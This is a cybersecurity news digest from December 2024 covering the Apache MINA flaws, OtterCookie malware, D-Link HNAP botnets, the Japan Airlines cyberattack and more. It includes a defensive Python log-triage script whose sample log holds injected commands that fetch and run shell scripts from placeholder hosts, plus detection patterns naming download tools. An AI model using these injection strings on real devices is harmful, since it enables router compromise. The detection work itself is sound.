Cyber Threat Intelligence 27 December 2024
Industrial Sector
- Securing Remote OT Operations
"As OT environments become more interconnected, organizations can manage operations remotely, enhancing efficiency and enabling greater oversight even from a distance. However, these advancements come with heightened security risks. A recent report from Palo Alto Networks and ABI Research found that 74% of respondents noticed an increase in remote access, creating more entry points for attackers. This expanded attack surface has made OT systems a prime target for cyber threats, underscoring the need for a robust security framework tailored to remote OT environments."
https://www.paloaltonetworks.com/blog/2024/12/securing-remote-ot-operations/
Government/Law/Policy
- UN General Assembly Approves Cybercrime Treaty Despite Industry Backlash
"The United Nations General Assembly adopted a landmark cybercrime convention on Tuesday, paving the way for significant changes to how governments police the internet. The Convention against Cybercrime was adopted without a vote and by consensus after a five-year negotiation. A formal signing ceremony will be held in Hanoi in 2025 and the convention will take force 90 days after being ratified."
https://therecord.media/un-general-assembly-approves-cybercrime-treaty-despite-industry-pushback
Vulnerabilities
- Apache Warns Of Critical Flaws In MINA, HugeGraph, Traffic Control
"The Apache Software Foundation has released security updates to address three severe problems that affect MINA, HugeGraph-Server, and Traffic Control products. The vulnerabilities were patched in new software versions released between December 23 and 25. However, the holiday period may lead to a slower patching rate and increased risk of exploitation. One of the bugs is tracked as CVE-2024-52046 and impacts MINA versions 2.0 through 2.0.26, 2.1 through 2.1.9, and 2.2 through 2.2.3. The issue received a critical severity score of 10 out of 10 from the Apache Software Foundation."
https://www.bleepingcomputer.com/news/security/apache-warns-of-critical-flaws-in-mina-hugegraph-traffic-control/
Malware
- New 'OtterCookie' Malware Used To Backdoor Devs In Fake Job Offers
"North Korean threat actors are using new malware called OtterCookie in the Contagious Interview campaign that is targeting software developers. Contagious Interview has been active since at least December 2022, according to researchers at cybersecurity company Palo Alto Networks. The campaign targets software developers with fake job offers to deliver malware such as BeaverTail and InvisibleFerret. A report from NTT Security Japan notes that the Contagious Interview operation is now using a new piece of malware called OtterCookie, which was likely introduced in September and with a new variant appearing in the wild in November."
https://www.bleepingcomputer.com/news/security/new-ottercookie-malware-used-to-backdoor-devs-in-fake-job-offers/
- Botnets Continue To Target Aging D-Link Vulnerabilities
"FortiGuard Labs noticed a spike in the activity of two different botnets in October and November of 2024. One was the Mirai variant “FICORA,” and the other was the Kaiten variant “CAPSAICIN.” These botnets are frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings action on the HNAP (Home Network Administration Protocol) interface. This HNAP weakness was first exposed almost a decade ago, with numerous devices affected by a variety of CVE numbers, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112."
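The excerpt above describes the exploitation pattern (a GetDeviceSettings action on the HNAP interface carrying attacker commands) but not how a defender would spot it in their own traffic. The following is an added example, not code from FortiGuard or D-Link: a small Python triage script that parses a constructed, tab-separated request log and flags HNAP GetDeviceSettings requests whose SOAPAction header or body contains shell metacharacters, then counts repeat offenders per source address. The log format, the sample addresses, the command fragments, and the metacharacter/download-verb heuristics are all assumptions made here for illustration; they are generic indicators, not a signature for any single CVE in the list.

```python
"""Triage HNAP request logs for GetDeviceSettings command-injection attempts.

Added example for the FortiGuard FICORA/CAPSAICIN item; not vendor code.
Assumptions (not from the article): the tab-separated log format below is
constructed, and the shell-metacharacter / download-verb heuristics are
generic indicators rather than a per-CVE signature.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Shell syntax that has no business inside a SOAPAction URI or a SOAP body.
SHELL_METACHARS = re.compile(r"[`;|]|&&|\$\(")
# Verbs botnet stagers typically use to pull the next-stage binary.
DOWNLOAD_VERBS = re.compile(r"\b(wget|curl|tftp|ftpget|busybox)\b", re.IGNORECASE)
GET_DEVICE_SETTINGS = re.compile(r"GetDeviceSettings", re.IGNORECASE)

# Constructed sample log (assumption): src_ip, method, path, SOAPAction, body, tab-separated.
SAMPLE_LOG = "\n".join([
    # benign HNAP client call: action URI ends at the action name, plain SOAP body
    "203.0.113.5\tPOST\t/HNAP1/\thttp://purenetworks.com/HNAP1/GetDeviceSettings\t<soap:Envelope><GetDeviceSettings/></soap:Envelope>",
    # header injection: command appended after the action name, fetches a stager
    "198.51.100.7\tPOST\t/HNAP1/\thttp://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp;wget http://198.51.100.9/x.sh;sh x.sh`\t",
    # non-HNAP traffic, ignored
    "192.0.2.4\tGET\t/login.html\t-\t",
    # body injection without a download verb
    "198.51.100.8\tPOST\t/HNAP1/\thttp://purenetworks.com/HNAP1/GetDeviceSettings\t<GetDeviceSettings>`reboot`</GetDeviceSettings>",
    # same attacker again, different stager host
    "198.51.100.7\tPOST\t/HNAP1/\thttp://purenetworks.com/HNAP1/GetDeviceSettings/`curl http://198.51.100.10/b`\t",
    # malformed line, skipped by the parser
    "garbage",
])


@dataclass
class HnapRequest:
    src_ip: str
    method: str
    path: str
    soapaction: str
    body: str


@dataclass
class Finding:
    src_ip: str
    reason: str
    evidence: str


def parse_log(text: str) -> List[HnapRequest]:
    """Parse the constructed format; lines without exactly five fields are dropped."""
    requests: List[HnapRequest] = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 5:
            continue
        src_ip, method, path, soapaction, body = parts
        requests.append(HnapRequest(src_ip, method, path, soapaction.strip('"'), body))
    return requests


def classify(req: HnapRequest) -> Optional[Finding]:
    """Return a Finding for HNAP GetDeviceSettings requests carrying shell syntax."""
    if not req.path.startswith("/HNAP1"):
        return None
    in_header = GET_DEVICE_SETTINGS.search(req.soapaction)
    if not in_header and not GET_DEVICE_SETTINGS.search(req.body):
        return None
    # A legitimate action URI ends at the action name; inspect only what follows it.
    header_tail = req.soapaction[in_header.end():] if in_header else ""
    for field_name, field in (("soapaction", header_tail), ("body", req.body)):
        if SHELL_METACHARS.search(field):
            reason = "hnap_command_injection"
            if DOWNLOAD_VERBS.search(field):
                reason = "hnap_command_injection_with_payload_download"
            return Finding(req.src_ip, reason, f"{field_name}: {field[:80]}")
    return None


def scan(text: str) -> List[Finding]:
    """Run classify() over every parsed request and keep the hits, in log order."""
    return [f for f in map(classify, parse_log(text)) if f is not None]


def top_sources(findings: List[Finding], min_hits: int = 2) -> Dict[str, int]:
    """Source addresses with at least min_hits findings: candidates for blocking."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.src_ip] = counts.get(f.src_ip, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= min_hits}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f.src_ip}\t{f.reason}\t{f.evidence}")
    print("repeat sources:", top_sources(hits))
```

On the sample log the script flags three requests from two addresses and reports 198.51.100.7 as a repeat source; the benign GetDeviceSettings call and the non-HNAP request pass. The heuristic deliberately ignores the action name alone, since legitimate HNAP clients issue GetDeviceSettings constantly; it is the trailing shell syntax that distinguishes the exploit attempts these botnets rely on.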
https://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities
- Defense Giant General Dynamics Says Employees Targeted In Phishing Attack
"Aerospace and defense giant General Dynamics says threat actors compromised dozens of employee benefits accounts after a successful phishing campaign targeting its personnel. The unauthorized activity was discovered on October 10, after the attackers had accessed and made changes to the employee benefits accounts through a login portal hosted by a third party."
https://www.securityweek.com/defense-giant-general-dynamics-says-employees-targeted-in-phishing-attack/
Breaches/Hacks/Leaks
- Japan Airlines Cyberattack Disrupts Flights As Holiday Season Begins
"Japan Airlines' network suffered a cyberattack Thursday, disrupting luggage services and delaying flights at the start of the New Year holiday season, before being restored later in the day. The airline said customers could once again purchase tickets for both domestic and international flights after a temporary halt, adding that no personal information was leaked and no damage was caused by computer viruses. JAL said the issues began around 7:25 a.m., delaying more than 60 domestic and international flights by up to four hours and leading to the cancellation of two domestic flights. While ticket sales were temporarily halted, previously made reservations remained valid."
https://english.kyodonews.net/news/2024/12/33b9ee9a0030-urgent-jals-system-under-cyberattack-domestic-and-intl-flights-delayed.html
https://securityaffairs.com/172319/hacking/japan-airlines-hit-cyberattack.html
https://therecord.media/japan-airlines-resumes-operations-after-cyberattack
https://www.securityweek.com/japan-airlines-was-hit-by-a-cyberattack-delaying-flights-during-the-year-end-holiday-season/
https://www.itnews.com.au/news/jals-systems-back-to-normal-after-cyber-attack-614102
General News
- DDoS Attacks Surge As Africa Expands Its Digital Footprint
"Rising Internet adoption and digital transformation initiatives are exposing organizations in Africa to a growing range of cyber threats. One manifestation of the trend is a steady increase in distributed denial-of-service (DDoS) attacks on organizations in a handful of North African countries — which also happen to be the ones with the highest Internet penetration rates in the region."
https://www.darkreading.com/cloud-security/ddos-attacks-surge-africa-digital-footprint
- Service Disruptions Continue To Blindside Businesses
"Service disruptions remain a critical concern for IT and business executives, with 88% of respondents saying they believe another major incident will occur in the next 12 months, according to PagerDuty. PagerDuty surveyed 1,000 IT and business executives who were director level and above, from the US, UK, Australia and Japan."
https://www.helpnetsecurity.com/2024/12/26/service-disruptions-concern/
- iOS Devices More Exposed To Phishing Than Android
"The mobile threat landscape continues to grow at an alarming rate as cybercrime groups shift their tactics and target mobile devices in the early stages of their attacks, according to a recent Lookout report. The report highlights insights behind a 17% increase QoQ (quarter on quarter) in enterprise-focused credential theft and phishing attempts, 32% increase QoQ in malicious app detections and a trend showing iOS devices are more exposed to phishing attacks than Android devices."
https://www.helpnetsecurity.com/2024/12/26/mobile-devices-attacks/
- South Korea Sanctions 15 North Koreans For IT Worker Scams, Financial Hacking Schemes
"The South Korean government has sanctioned more than a dozen individuals and one organization for a wide-ranging global scheme to fund North Korea’s nuclear and missile programs through impersonating IT workers abroad, stealing cryptocurrency and facilitating cyberattacks."
https://cyberscoop.com/south-korea-sanctions-north-koreans-it-worker-scams/
- Emerging Threats & Vulnerabilities To Prepare For In 2025
"In 2024, we at Dark Reading covered a variety of attacks, exploits, and, of course, vulnerabilities across the board. Here, we recount 10 emerging threats organizations should be prepared for — as detailed by Dr. Jason Clark in "10 Emerging Vulnerabilities Every Enterprise Should Know," a Dark Reading webinar — as they continuously rise and develop in 2025."
https://www.darkreading.com/vulnerabilities-threats/emerging-threats-vulnerabilities-prepare-2025
- The Intersection Of AI And OSINT: Advanced Threats On The Horizon
"Intelligence operations have undergone a profound transformation. Gone are the days when intelligence gathering relied purely on information obtained from human and other restricted sources. Today, much of the intelligence is publicly available – if one knows where and how to find it. This practice, known as Open Source Intelligence (OSINT), has emerged as an essential tool, especially in cybersecurity. Traditionally, OSINT proved to be a powerful tool for defenders. Security teams use it to proactively research publicly available information so they can thwart threat actors by preempting their moves. On the flip side, studies reveal that bad actors too have been leveraging OSINT to target organizations and their key executives."
https://www.securityweek.com/the-intersection-of-ai-and-osint-advanced-threats-on-the-horizon/
- Brazilian Man Charged With Making Extortionate Threats To Publicize Stolen Data Obtained By Unlawful Computer Intrusion
"A citizen and resident of Brazil was charged with making extortionate threats to publicize data stolen from the Brazilian subsidiary of a New Jersey company, U.S. Attorney Philip R. Sellinger announced. Junior Barros De Oliveira, 29, of Curitiba, Brazil was charged with four counts of extortionate threats involving information obtained from protected computers in violation of Title 18, United States Code, Section 1030(a)(7)(B) and four counts of threatening communications in violation of Title 18, United States Code, Section 875(d) in an indictment unsealed today in Newark federal court."
https://www.justice.gov/usao-nj/pr/brazilian-man-charged-making-extortionate-threats-publicize-stolen-data-obtained
https://thehackernews.com/2024/12/brazilian-hacker-charged-for-extorting.html
Reference
Electronic Transactions Development Agency (ETDA)